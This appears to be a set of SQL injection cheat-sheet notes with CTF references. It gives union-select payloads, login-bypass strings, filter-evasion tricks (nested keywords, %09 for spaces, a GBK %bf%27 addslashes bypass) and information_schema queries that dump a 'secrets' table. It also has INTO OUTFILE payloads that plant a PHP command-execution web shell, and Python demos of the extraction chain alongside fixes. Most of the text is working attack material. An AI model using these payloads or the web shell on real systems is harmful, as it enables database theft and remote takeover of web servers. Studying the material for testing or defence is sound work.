SQL Injections (sqli)

Basics

http://xyz.com/hello.php?id=1 and 1=2 union select 1,2,3

Falsify the first: read the original statement carefully. We bolt a second 'select' onto it with UNION so the page renders our rows instead of its own. Using 'and 1=2' makes the WHERE clause of the original query false, so the first half returns zero rows and only the rows from our 'hacker select' come back.

Union: the 'Union' keyword in SQL joins the result sets of two complete select statements. Both selects must return the same number of columns (with compatible types), which is why column counts matter below. We call 'select 1,2,3' just as a test: it returns the literal row 1,2,3 without reading any table, so if those numbers appear on the page you know the injection works and which column positions are displayed. A real payload swaps in a query that reads data, e.g. "select * from teachers where id = 20".

Functions: built-in functions can be selected directly to fingerprint the target: select user(), select version(), select database()

Column counts: if the database complains that the selects have a different number of columns, pad your select with literals until it matches: select datax, dataz, 3,4,5 .. or however many you need (remember 3,4,5 are placeholders and return no real data). You can also find the count first with 'order by 1', 'order by 2', ... until the query errors.

Quote Guessing:

  • The quoting depends on how the original query is written: your value may land inside single quotes, double quotes or parentheses. You will need to experiment with single quotes, double quotes, and comments. A comment is -- (two dashes followed by a space); everything after it on the line is ignored.

  • Sorry, but you will need to keep trying different selects and quote styles until one works. This is a labor of love ... SQL injection!

  • ALWAYS put a space after the -- comment (MySQL requires it), e.g. "1=1 -- ". In MySQL, # also starts a comment and needs no space after it.

'OR '1' = 1
' OR '1'='1
' OR '1'='1' {
' OR '1'='1' /* 
' OR '1'='1' --
' OR 1=1' --
' OR 1=1 --
" OR 1=1 -- 
' OR 1=1 LIMIT 1 --
") OR 1=1 --       
") OR "1"="1" --   
'OR1=1#            

http://xyz.com/hello.php?id=1 AND 1=2 UNION SELECT 1,2,3
http://xyz.com/hello.php?id=1 AND 1=2 UNION SELECT 1,2,3--
http://xyz.com/hello.php?id=1 AND 1=2 'UNION SELECT 1,2,3,4'--
http://xyz.com/hello.php?id=1' AND 1=2 UNION SELECT 1,2,3,4--'
http://xyz.com/hello.php?id=1 AND 1=2' UNION SELECT "a","b"--'
http://xyz.com/hello.php?id=1' AND 1=2 UNION SELECT database(),user(),version() --
http://xyz.com/hello.php?id=1 AND 1=2' UNION SELECT "../etc/somefile","b"--'

admin'||1=1#               .. in MySQL '||' means 'or' (unless the PIPES_AS_CONCAT mode is enabled, which makes it string concatenation), so no space is needed!
admin'||1#

Inspect:

Sometimes an injection works but the result does not show on the rendered page: it may land in a hidden field, an attribute or an HTML comment. Get familiar with your browser's 'Inspect Element' / developer tools and read the page source.. you might just find your injection was successful after all!

Trimming:

Some sites protect against hacking through trimming: removing banned keywords from the input. If a website got smart and strips 'select' in a single pass without re-scanning the result, sending 'selselectect' gets trimmed to 'select'! The inner copy is removed and the two halves rejoin. If the filter is trimming the word 'on' instead, watch how it trims: a filter that removes only the first match turns 'unionon' into 'union', but a filter that removes every match in one pass turns 'unionon' into 'uni', so nest the copy in the middle instead ('unioonn' -> 'union'). None of this beats a filter that re-applies itself until nothing changes. What if your target is trimming spaces? That can be a real headache. Try %09 (the tab character) instead of a space; other whitespace such as %0a (newline) or an inline comment /**/ also works as a separator in MySQL. This might get you around it!

Page is blocking the space character to stop injections
Use %09 (aka TAB) to get around it!
Error: "no space"? Spaces are blocked.. to prevent injections
admin' or 1=1 -- 
Using Burp:
Substitute every space with %09 (aka 'Tab'), and keep the & so the password field is still sent
username=admin%27+or+1%3D1+--+&password=passwd            ..original, spaces encoded as +
username=admin%27%09or%091%3D1%09--%09&password=passwd    ..every space replaced by %09

Pulling Data from other Tables

Find other tables:
SELECT table_schema, table_name FROM information_schema.TABLES 
Metadata'and 1 = 2 union select 1,table_schema, GROUP_CONCAT(table_name SEPARATOR ', ') FROM information_schema.TABLES -- 

Find columns in the 'secrets' table:
select column_name, table_name FROM information_schema.columns
Metadata'and 1 = 2 union SELECT 1,GROUP_CONCAT(column_name SEPARATOR ', '), table_name FROM information_schema.columns WHERE TABLE_NAME = 'secrets' -- 

select pwn from secrets:
Metadata'and 1 = 2 union SELECT 1,eat, GROUP_CONCAT(pwn SEPARATOR ', ') FROM secrets --

select a column with the weird name '*' (the backticks quote the identifier so MySQL does not treat it as a wildcard):
Metadata'and 1 = 2 union SELECT 1,2,GROUP_CONCAT(`*` SEPARATOR ', ') FROM secrets -- 
Metadata'and 1 = 2 union SELECT 1,2,`*` FROM secrets WHERE `*` like 'MYDATA%' -- 
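The whole chain from the Basics section (falsify the first, union probe, column count) through the information_schema enumeration above, as an added runnable example that is not from the original page. It uses Python's built-in sqlite3 instead of MySQL so it runs offline: sqlite_master stands in for information_schema.TABLES, pragma_table_info() for information_schema.columns, and group_concat(x, ', ') for GROUP_CONCAT(x SEPARATOR ', '). The teachers/secrets schema, the sample rows and the flag strings are constructed for the demo; the page's column names 'eat' and 'pwn' are reused.

```python
import sqlite3

# Constructed sample schema: a 3-column 'teachers' lookup (the page's hello.php?id=)
# and a 'secrets' table with the page's column names 'eat' and 'pwn'. Data is made up.
SCHEMA = """
CREATE TABLE teachers (id INTEGER PRIMARY KEY, name TEXT, subject TEXT);
INSERT INTO teachers VALUES (1, 'Ada', 'maths'), (2, 'Grace', 'compsci');
CREATE TABLE secrets (id INTEGER PRIMARY KEY, eat TEXT, pwn TEXT);
INSERT INTO secrets VALUES (1, 'cake', 'flag{union_select}'), (2, 'pie', 'flag{group_concat}');
"""


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param):
    """hello.php?id=... done wrong: the parameter is pasted straight into the SQL text."""
    sql = f"SELECT id, name, subject FROM teachers WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param):
    """The fix: bind id_param as a value; the driver never parses it as SQL."""
    sql = "SELECT id, name, subject FROM teachers WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


def probe_column_count(conn, max_cols=10):
    """Step 1: pad 'union select' with literals until the column counts match.
    A mismatch is a query error; the first count that runs is the answer."""
    for n in range(1, max_cols + 1):
        placeholders = ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_lookup(conn, f"1 and 1=2 union select {placeholders}")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_cell(conn, from_clause, expr):
    """The page's 'and 1=2 union select' pattern: 1=2 empties the real result, so the
    only row that comes back is ours, and we read its second (displayed) column."""
    payload = f"1 and 1=2 union select 1, {expr}, 3 {from_clause}"
    return vulnerable_lookup(conn, payload)[0][1]


def enumerate_tables(conn):
    """Step 2: every table name in one cell (information_schema.TABLES in MySQL)."""
    return union_cell(conn, "from sqlite_master where type='table'",
                      "group_concat(name, ', ')")


def enumerate_columns(conn, table):
    """Step 3: the column names of one table (information_schema.columns in MySQL)."""
    return union_cell(conn, f"from pragma_table_info('{table}')",
                      "group_concat(name, ', ')")


def dump_column(conn, table, column):
    """Step 4: read the column we actually want out of the discovered table."""
    return union_cell(conn, f"from {table}", f"group_concat({column}, ', ')")


if __name__ == "__main__":
    db = new_db()
    print("columns:", probe_column_count(db))                    # 3
    print("tables:", enumerate_tables(db))
    print("secrets columns:", enumerate_columns(db, "secrets"))  # id, eat, pwn
    print("secrets.pwn:", dump_column(db, "secrets", "pwn"))     # flag{union_select}, flag{group_concat}
    # The same payload against the parameterized query returns nothing.
    print("safe:", safe_lookup(db, "1 and 1=2 union select 1,2,3"))  # []
```

On a real MySQL target, add WHERE table_schema = database() to the table enumeration so you only see the application's own tables, and remember that GROUP_CONCAT is truncated at group_concat_max_len (1024 bytes by default), so long listings need paging with LIMIT.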

PHP Injections

Create a file to execute a ping (this needs the MySQL FILE privilege, secure_file_priv empty or covering the webroot, and a webroot the MySQL server process can write to; the six quoted columns must match the original query's column count):

" union select "<?php system(\"ping -c 4 10.10.10.60\");","","","","","" into outfile "/var/www/html/filename.php" #
" union select "<?php system(\"echo '<pre>'; ping -c 4 10.10.10.60\");","","","","","" into outfile "/var/www/html/filename.php" #


Make a command injection page:

" union select "<?php if (isset($_REQUEST['cmd'])){ echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; } ?><form action=<?php echo basename($_SERVER['PHP_SELF'])?>> <input type=text name=cmd size=20> <input type=submit></form>","","","","","" into outfile "/var/www/html/filename.php" #

Zixem CTF

SQLi GBK China

  • Rare, but interesting: the GBK charset used for simplified Chinese

  • A charset mismatch between PHP's escaping and MySQL, when implemented badly, allows an injection bypass!

  • 2006 method to bypass addslashes

  • It relies on how MySQL interprets escaped bytes, which depends on the charset used by the connection. If the database driver is not aware of the charset in use it will not perform the right escaping, creating an exploitable situation. This exploit relies on the usage of GBK, a multibyte character set for simplified Chinese. Because the database driver and the database don't "talk" the same charset, it is possible to generate a single quote and break out of the SQL syntax to inject a payload.

Using the string \xBF' (URL-encoded as %bf%27), it's possible to get a 
single quote that does not get escaped properly: addslashes() turns the 
bytes BF 27 into BF 5C 27, and MySQL reading GBK treats BF 5C as one 
two-byte character, leaving the quote bare. 
It's therefore possible to inject an always-true condition using 

%bf%27 or 1=1 -- and bypass the authentication.

The problem comes from the application changing the connection 
charset with an SQL query: 

SET CHARACTER SET 'GBK';

The client library never sees that change, so its escaping still assumes 
the old charset. Remediate by setting the connection charset through the 
driver API (mysqli_set_charset() / mysql_set_charset() in PHP) so that 
mysql_real_escape_string() becomes charset-aware, instead of via a query, 
and better still use prepared statements; addslashes() is never charset-aware. 
It is a pretty unlikely issue for a web application but still good to know!

Burp
username=admin&password=test                   ..normal
username=admin%bf%27&password=test             ..the quote is "escaped", but the backslash is eaten by the GBK byte pair
username=admin%bf%27+or+1=1+--+&password=test  ..with injection, worked!!!
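How the %bf%27 trick defeats byte-wise escaping, as an added runnable example that is not from the original page. addslashes() here is a simplified Python copy of PHP's (it escapes the two quote characters and the backslash); server_view-style decoding with Python's gbk codec stands in for what the MySQL server does once the connection charset is GBK. The users table and the 'test' password are constructed. charset_aware_escape() shows why escaping after decoding (what mysql_real_escape_string() does once the charset is set through the driver) does not have the problem.

```python
import urllib.parse


def addslashes(data: bytes) -> bytes:
    """Simplified PHP addslashes(): byte-wise, puts a backslash before ' " and \\.
    It has no idea which charset the bytes belong to."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):   # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def form_value_bytes(encoded: str) -> bytes:
    """Raw bytes PHP receives for a form field such as admin%bf%27+or+1=1+--+."""
    return urllib.parse.unquote_to_bytes(encoded.replace("+", "%20"))


def login_query(username: bytes, password: bytes = b"test") -> str:
    """The vulnerable app: escape with addslashes(), splice into the SQL, and return
    what the server sees after it decodes the statement as GBK (constructed table name)."""
    sql = (b"SELECT id FROM users WHERE username = '" + addslashes(username)
           + b"' AND password = '" + addslashes(password) + b"'")
    return sql.decode("gbk")


def quote_escaped_in_gbk(username: bytes) -> bool:
    """True if the backslash added by addslashes() still precedes the quote once the
    bytes are read as GBK. For BF 27 the pair BF 5C becomes one character instead."""
    return "\\'" in addslashes(username).decode("gbk")


def charset_aware_escape(raw: bytes, charset: str = "gbk") -> str:
    """Decode first, escape characters second: a lone 0xBF followed by a quote is not a
    valid GBK sequence, so it cannot swallow the backslash. Prepared statements avoid
    the whole issue because the value is never spliced into SQL text at all."""
    text = raw.decode(charset, errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'")


if __name__ == "__main__":
    plain = form_value_bytes("admin%27")
    attack = form_value_bytes("admin%bf%27+or+1=1+--+")
    print(quote_escaped_in_gbk(plain))    # True: admin\' stays escaped
    print(quote_escaped_in_gbk(attack))   # False: BF 5C was read as one GBK character
    print(login_query(attack))            # the quote after the GBK char is bare, " or 1=1 -- " is live SQL
    print(charset_aware_escape(attack))   # the quote is escaped again
```

The same experiment with mysql_real_escape_string() behaves like addslashes() when the connection charset was changed by SET CHARACTER SET, and like charset_aware_escape() when it was set with mysqli_set_charset(), which is the whole point of the remediation above.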
